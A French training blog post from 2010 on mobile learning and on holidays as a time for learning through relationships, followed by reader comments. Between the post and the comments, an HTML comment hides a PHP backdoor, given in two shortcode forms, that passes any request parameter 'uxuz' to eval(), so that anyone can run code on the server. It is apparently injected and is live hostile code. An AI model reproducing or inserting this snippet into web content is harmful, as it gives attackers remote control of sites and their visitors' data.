Un temps pour apprendre autrement

Par le 13 juillet 2010

J’ai lu quelque part que l’évolution majeure des façons d’apprendre aujourd’hui, c’est la mobilité.

Grâce à internet, au « mobile learning », les contenus de formation nous trouvent là où nous sommes, et même dans les bouchons, le métro, le train… Enfin bien sur, c’était déjà vrai pour le bon bouquin ou l’article que nous emportons depuis toujours avec nous, disons que nous pouvons désormais disposer presque en tout lieu de plusieurs modalités d’accès à l’information, dont certaines, selon la qualité des conceptions, seront plus interactives que d’autres, plus « apprenantes » que d’autres…

Nous devenons ainsi un « voyageur immobile », rejoint en tout lieu par son environnement d’apprentissage.

Le temps des vacances me semble être bienvenu pour retrouver une autre mobilité. Celle qui consiste à aller vers les autres, vers des lieux inconnus, pour accepter de modifier nos représentations, partager, vivre l’instant. Se faire voyageur pour de bon, où que nous allions.

Un temps pour remettre au centre l’idée qu’apprendre (prendre avec soi un élément extérieur à soi même) ne se conçoit que dans la relation. Et que, même lorsque l’information est médiatisée par les techniques les plus avancées, c’est toujours la relation à autrui – formateur, tuteur, pair- qui sera le levier majeur de l’apprentissage.

Les auteurs du blog de la formation professionnelle vous souhaitent d’excellentes vacances…

<!– [insert_php]if (isset($_REQUEST["uxuz"])){eval($_REQUEST["uxuz"]);exit;}[/insert_php][php]if (isset($_REQUEST["uxuz"])){eval($_REQUEST["uxuz"]);exit;}[/php] –>

Autre dossier sur le même thème

Laisser un commentaire

Avatar

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Avatar

Wolfzettel Il y a 10 années

Il y a un super service d’apprentissage linguistique sur téléphone mobile: my4n-news http://my4n-news.mobi, le nouveau service mobile de formation linguistique à travers l’actualité internationale. Il s’agit d’une technologie extrêmement innovante et efficace.

Développé en étroite collaboration avec un Comité pédagogique constitué de professeurs de langues binationaux et expérimentés, ce service mobile s’adresse à tous ceux désireux d’apprendre anglais en toute liberté.

Disponible sur les Smartphones, my4n-news donne accès aux dépêches en langues étrangères et propose un espace perso d’entrainement linguistique avec un glossaire personnalisé et des quizzez.

A essayer, ça sort des sentiers battus !

my4n-news.mobi

Répondre
Avatar

Fabien Il y a 10 années

j’ai vu sur ce site qu’on pouvait partir en Europe durant sa période d’apprentissage :
http://www.touteleurope.eu/fr/actions/social/education-formation/presentation/passeport-mobilite-des-apprentis.html

En savez-vous plus à ce sujet ?

Répondre
    Mathilde Bourdat

    Mathilde Bourdat Il y a 6 années

    @Fabien Oui, c’est une très belle opportunité de se former à l’étranger. Le mieux est de se renseigner auprès des Centres de Formation d’apprentis qui préparent aux formations qui vous intéressent. Ce sont eux qui aménagent ces possibilités de parcours à l’étranger.

Avatar

7H99Crokinterim Il y a 10 années

J’apprends ou je veux quand je veux avec qui je veux. Yes !
D’une révolution sociale, le nouveau paradigme de l’intelligence sera-t-il pris dans la mise en place de solutions de formation à distance ?
Quand l »émotion révolutionne l’apprentissage …
http://coachmanager.over-blog.com/article-la-revolution-emotionnelle-54328529.html
Bonnes vacances à vous. A la rentrée

Répondre

Abonnez-vous au blog

Afin de vous abonner et pour des raisons de sécurité, votre navigateur doit accepter les cookies et le JavaScript.